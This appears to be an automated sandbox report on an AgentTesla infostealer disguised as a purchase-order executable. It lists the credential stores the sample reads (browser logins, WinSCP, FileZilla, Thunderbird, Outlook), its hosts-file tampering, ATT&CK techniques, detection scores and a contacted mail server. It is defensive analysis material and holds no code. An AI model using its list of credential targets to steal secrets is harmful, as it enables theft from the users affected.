Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Queries volume information: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Queries volume information: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Queries volume information: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\PO #047428.exe

Code function: 4_2_062D4FFC GetUserNameW,

4_2_062D4FFC

Source: C:\Users\user\Desktop\PO #047428.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Modifies the hosts file

Show sources

Source: C:\Users\user\Desktop\PO #047428.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000000.00000002.256271000.0000000003DF5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.619723039.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.619632627.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.338811978.0000000004807000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kprUEGC.exe PID: 6276, type: MEMORY
Source: Yara match	File source: Process Memory Space: kprUEGC.exe PID: 5548, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO #047428.exe PID: 4616, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO #047428.exe PID: 6268, type: MEMORY
Source: Yara match	File source: 4.2.PO #047428.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.kprUEGC.exe.400000.0.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\PO #047428.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\PO #047428.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000004.00000002.624912957.0000000003081000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.624776782.0000000003021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kprUEGC.exe PID: 6276, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO #047428.exe PID: 6268, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000000.00000002.256271000.0000000003DF5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.619723039.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.619632627.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.338811978.0000000004807000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kprUEGC.exe PID: 6276, type: MEMORY
Source: Yara match	File source: Process Memory Space: kprUEGC.exe PID: 5548, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO #047428.exe PID: 4616, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO #047428.exe PID: 6268, type: MEMORY
Source: Yara match	File source: 4.2.PO #047428.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.kprUEGC.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	Scheduled Task/Job1	Process Injection112	File and Directory Permissions Modification1	OS Credential Dumping2	Account Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter2	Registry Run Keys / Startup Folder1	Scheduled Task/Job1	Disable or Modify Tools1	Input Capture211	File and Directory Discovery1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scheduled Task/Job1	Logon Script (Windows)	Registry Run Keys / Startup Folder1	Deobfuscate/Decode Files or Information1	Credentials in Registry1	System Information Discovery114	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Query Registry1	Distributed Component Object Model	Input Capture211	Scheduled Transfer	Application Layer Protocol111	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing13	LSA Secrets	Security Software Discovery321	SSH	Clipboard Data1	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Virtualization/Sandbox Evasion14	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion14	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection112	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Hidden Files and Directories1	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PO #047428.exe	56%	Virustotal		Browse
PO #047428.exe	30%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
PO #047428.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\yXAQfeQN.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	30%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Roaming\yXAQfeQN.exe	30%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
4.2.PO #047428.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8		Download File
19.2.kprUEGC.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8		Download File

Domains

Source	Detection	Scanner	Label	Link
mail.sharqcapital.qa	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://H7QA9fZzbgw.org	0%	Avira URL Cloud	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
https://api.ipify.org%$	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://YpMPnj.com	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://mail.sharqcapital.qa	0%	Avira URL Cloud	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
https://api.ipify.org%	0%	URL Reputation	safe
https://api.ipify.org%	0%	URL Reputation	safe
https://api.ipify.org%	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mail.sharqcapital.qa	104.156.59.2	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://H7QA9fZzbgw.org	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	PO #047428.exe, 00000004.00000002.624912957.0000000003081000.00000004.00000001.sdmp, kprUEGC.exe, 00000013.00000002.624776782.0000000003021000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.apache.org/licenses/LICENSE-2.0	PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false		high
http://DynDns.comDynDNS	kprUEGC.exe, 00000013.00000002.624776782.0000000003021000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	PO #047428.exe, 00000004.00000002.624912957.0000000003081000.00000004.00000001.sdmp, kprUEGC.exe, 00000013.00000002.624776782.0000000003021000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false		high
http://www.tiro.com	kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.ipify.org%$	PO #047428.exe, 00000004.00000002.624912957.0000000003081000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.carterandcone.coml	PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://YpMPnj.com	kprUEGC.exe, 00000013.00000002.624776782.0000000003021000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false		high
https://api.ipify.org%GETMozilla/5.0	kprUEGC.exe, 00000013.00000002.624776782.0000000003021000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.fonts.com	PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	PO #047428.exe, 00000000.00000002.260837076.0000000006CA2000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.343690594.0000000006330000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://mail.sharqcapital.qa	PO #047428.exe, 00000004.00000002.627066309.00000000033A2000.00000004.00000001.sdmp, kprUEGC.exe, 00000013.00000002.627191703.000000000337F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PO #047428.exe, 00000000.00000002.254592778.0000000002AE1000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.334527728.0000000003440000.00000004.00000001.sdmp	false		high
